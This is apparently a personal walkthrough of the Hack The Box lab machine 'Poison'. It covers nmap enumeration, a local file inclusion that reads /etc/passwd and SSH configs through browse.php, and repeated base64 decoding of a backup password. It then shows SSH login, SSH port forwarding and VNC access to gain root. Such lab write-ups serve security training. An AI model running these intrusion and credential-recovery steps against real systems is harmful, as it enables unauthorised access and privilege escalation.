Published on

HTB Poison

Authors

Poison

Enumeration

nmap all ports, full enumerate

nmap -p- -sV -A <ip> --open -o full-enumerate.nmap

└─$ nmap -p- -sV -A $IP --open -o full-enumerate.nmap                                   130Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-19 20:24 EDT
Nmap scan report for 10.129.1.254
Host is up (0.035s latency).
Not shown: 55577 filtered tcp ports (no-response), 9956 closed tcp ports (conn-refused)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey: 
|   2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
|   256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_  256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.96 seconds

nmap (all identified TCP ports + default scripts & service versions)

nmap -p <1,2,3> -sV --script default --script http-methods --script http-headers <ip> -o <ip>-identified-ports.nmap

└─$ nmap -p 22,80 -sV --script default --script http-methods --script http-headers $IP -o identified-ports.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-19 20:26 EDT
Nmap scan report for 10.129.1.254
Host is up (0.027s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey: 
|   2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
|   256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_  256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
| http-headers: 
|   Date: Thu, 20 Jul 2023 00:27:02 GMT
|   Server: Apache/2.4.29 (FreeBSD) PHP/5.6.32
|   X-Powered-By: PHP/5.6.32
|   Connection: close
|   Content-Type: text/html; charset=UTF-8
|   
|_  (Request type: HEAD)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.01 seconds

nmap (vuln scan)

nmap -p <1,2,3> --script vuln <ip> -o <ip>-vuln.nmap

└─$ nmap -p 22,80 --script vuln $IP -o vuln.nmap                                                               
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-19 20:27 EDT
Nmap scan report for 10.129.1.254
Host is up (0.024s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-trace: TRACE is enabled
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.1.254
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://10.129.1.254:80/
|     Form id: 
|_    Form action: /browse.php
| http-enum: 
|   /info.php: Possible information file
|_  /phpinfo.php: Possible information file
| http-sql-injection: 
|   Possible sqli for forms:
|     Form at path: /, form's action: /browse.php. Fields that might be vulnerable:
|_      file
|_http-dombased-xss: Couldn't find any DOM based XSS.

Nmap done: 1 IP address (1 host up) scanned in 31.36 seconds

Port Enumeration

Port 80

  1. TLD shows us this:

    Untitled

  2. Placing a ' seems to break the application. Possible SQL injection?

    Untitled

  3. But, let’s look at every file first.

LFI

  1. listfiles.php exposed pwdbackup.txt
  2. Found LFI: http://10.129.1.254/browse.php?file=/etc/passwd was just thinking maybe I can read files? idk username Charix in passwd here
    1. http://10.129.1.254/browse.php?file=/etc/group
    2. http://10.129.1.254/browse.php?file=/etc/ssh/ssh_config
    3. http://10.129.1.254/browse.php?file=/etc/ssh/sshd_config
  3. So I went back to the /pwdbackup.txt and decoded it with a python script:
import base64

encoded_string = "Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVUbGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBSbVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVWM040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRsWmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYyeG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01GWkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYwMXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVaT1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5kWFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZkWGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZTVm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZzWkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBWVmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpOUkd4RVdub3dPVU5uUFQwSwo="

decoded_string = encoded_string
for _ in range(13):
	decoded_string = base64.b64decode(decoded_string)

print(decoded_string.decode('utf-8'))

  1. Did in range(13) because in pwdbackup.txt it said “This password is secure, it's encoded atleast 13 times.. what could go wrong really..”

  2. Ran it and got an interesting password:

    Untitled

  3. I just assumed “Charix” was the username, and I was right. It is also in LFI for /etc/passwd that we found earlier. and the password is what the base64 decoded is. ssh charix@<ip> got us in.

Root

  1. an ls -la shows us that secret.zip is owned by root , group owner is charix, and trying to unzip it gives us a password prompt.

    Untitled

  2. So I downloaded it to my host machine to try and crack it with scp charix@10.129.1.254:/home/charix/secret.zip ~/Lab/HTB/Poison

    1. zip2john secret.zip > key
    2. john —format=pkzip key
    3. didnt get shit
    4. tried unzip secret.zip and used Charix!2#4%6&8(0 which unzipped it, and gave me a weird file I cannot humanly read

  3. tried ps aux and this caught my attention:

Untitled

Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5901 -localhost -nolisten tcp :1

  1. VNC running on these ports to confirm: netstat -a

    Untitled

  2. Since its local we need to port forward from host machine to target machine:

    1. ssh -D 1080 -L6801:127.0.0.1:5801 -L6901:127.0.0.1:5901 charix@10.129.1.254
    2. What this is saying is: Listen on my box -L with the data from 127.0.0.1 for 5801 and 5901
    3. -D is dynamic port forwarding, SSH acts as a SOCKS proxy server. applications that are SOCKS protocol-aware send traffic through this proxy. 1080 is used for this purpose, defined in proxychains.conf. So we use proxychains to specify:

    Untitled

  3. We do indeed have a connection:

    Untitled

  4. Tried authenticating with vncviewer 127.0.0.1:6901 and got prompted with a password, maybe that secret file can be used now?

  5. vncviewer -passwd secret 127.0.0.1:6901 worked for root

    Untitled

  6. Then I copied cp /root/root.txt /home/charix/root.txt chown charix /home/charix/root.txt so I can read it with the user charix in ssh.

Useful resource links

https://book.hacktricks.xyz/network-services-pentesting/pentesting-vnc

Lessons Learned

  • Got some good base64 decoding in
  • Routing/forwarding was really cool here to see
  • ps aux showing
  • Vncviewer to connect and see the root flag